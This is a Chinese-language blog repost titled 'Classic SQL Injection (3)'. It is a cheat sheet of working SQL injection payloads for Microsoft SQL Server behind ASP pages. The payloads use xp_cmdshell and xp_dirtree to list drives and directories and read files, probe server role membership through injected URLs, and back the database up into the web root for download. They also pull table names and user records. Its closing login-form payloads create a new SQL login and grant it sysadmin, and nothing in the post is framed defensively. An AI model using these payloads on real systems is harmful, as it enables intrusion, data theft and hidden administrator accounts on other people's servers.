服务咨询热线:

022-88711099

当前位置:

经典SQL注入(3)

发布时间:2011/11/18 23:02:56 作者:夜风冷 访问量:1535

经典SQL注入(3)

经典SQL注入(3)
    本文发表于3年前
    遍历目录的方法:
    先创建一个临时表:temp
    '5;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
    5';insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
    5';insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
    5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构,并寸入temp表中5';insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看某个文件的内容
    5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
    5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--
    5';insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc'
    5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- (xp_dirtree适用权限PUBLIC)
    写入表:
    语句1:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
    语句2:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
    语句3:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
    语句4:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
    语句5:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
    语句6:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
    语句7:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
    语句8:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
    语句9:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_MEMBER('db_owner'));--
    把路径写到表中去:
    http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(100), id int)-
    http://http://www.xxxxx.com/down/list.asp?id=1;insert  dirs exec master.dbo.xp_dirtree 'c:\'-
    http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-
    http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in('@Inetpub'))-
    语句:http://http://www.xxxxx.com/down/list.asp?id=1;create table dirs1(paths varchar(100), id int)--
    语句:http://http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'e:\web'--
    语句:http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs1)-
    把数据库备份到网页目录:下载
    http://http://www.xxxxx.com/down/list.asp?id=1;declare @a sysname; set @a=db_name();backup database @a to disk='e:\web\down.bak';--
    and%201=(select%20top%201%20name%20from(select%20top%2012%20id,name%20from%20sysobjects%20where%20xtype=char(85))%20T%20order%20by%20id%20desc)
    and%201=(select%20Top%201%20col_name(object_id('USER_LOGIN'),1)%20from%20sysobjects) 参看相关表。
    and 1=(select%20user_id%20from%20USER_LOGIN)
    and%200=(select%20user%20from%20USER_LOGIN%20where%20user>1)
    如果可以通过连接符注释掉后面的验证,那么就更有意思了,来看我们能作什么:
    a、在用户名位置输入【admin';exec master.dbo.sp_addlogin Cool;--】,添加一个sql用户
    b、在用户名位置输入【admin';exec master.dbo.sp_password null,123456,Cool;--】,给Cool设置密码为123456
    c、在用户名位置输入【admin';exec master.dbo.sp_addsrvrolemember Cool,sysadmin;--】,给Cool赋予System Administrator权限
    文章到此结束!来 源: 互联网
    

这篇为批量导入文章,以下为之前站内评论!

  • 夜风冷发表于 3年前 阵风 3年前 回复 收起回复
        给你空间增加点人气!
         取消